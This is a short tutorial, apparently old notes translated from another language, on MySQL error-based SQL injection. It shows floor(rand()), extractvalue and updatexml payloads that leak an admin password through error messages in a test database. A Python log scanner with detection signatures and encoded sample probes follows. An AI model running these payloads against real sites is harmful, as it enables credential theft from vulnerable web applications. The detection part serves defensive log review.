Posting some old notes. When MySQL fails to execute a statement it raises an error message, and PHP+MySQL sites often print that error straight onto the page, so the three techniques below can be used to extract specific data from the error text.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
Statements such as the following can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked through the error message. To retrieve other data, replace the version() call with the desired subquery.
For example, to read the administrator's username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
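All three primitives above (floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml()) leave a recognizable shape in the request, so a defender can pick them out of web-server access logs even though the response status stays 200 and only the page body carries the error. The following is an added example, not part of the original notes: it URL-decodes and normalizes the query string, flags each technique, and runs over constructed sample log lines; the Apache-style log format, the /article.php path and the field names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the three error-based primitives discussed in the notes.
# Matched against the decoded, comment-stripped, lower-cased query string.
SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*?group\s+by"
        r"|group\s+by.*?floor\s*\(\s*rand", re.S),
    "extractvalue": re.compile(r"extractvalue\s*\(", re.S),
    "updatexml": re.compile(r"updatexml\s*\(", re.S),
}

# Apache combined-log prefix (assumed format): client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def normalize(query: str) -> str:
    """Decode twice (catches %25-double-encoding), drop /**/ comments used as
    whitespace substitutes, collapse whitespace and lower-case."""
    s = unquote_plus(unquote_plus(query))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s)
    return s.lower()

def classify(query: str) -> list:
    """Return the names of every error-based technique present in the query."""
    decoded = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines) -> list:
    """Return one hit per request whose path matches at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        techniques = classify(m.group(2))
        if techniques:
            hits.append({"ip": m.group(1), "path": m.group(2),
                         "status": int(m.group(3)), "techniques": techniques})
    return hits

# Constructed sample log: one benign request and the three probes from the notes
# (the last one double-encoded). Status is 200 in every case.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 980',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 200 977',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1%2520and%25201%253D(updatexml(1,concat(0x5e24,(select%2520user()),0x5e24),1)) HTTP/1.1" 200 960',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["techniques"])
```

Because the status code is 200 for every probe, alerting on HTTP errors alone misses this class entirely; the signature match on the decoded query is what surfaces it.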
That's all, thanks to the foreign guys.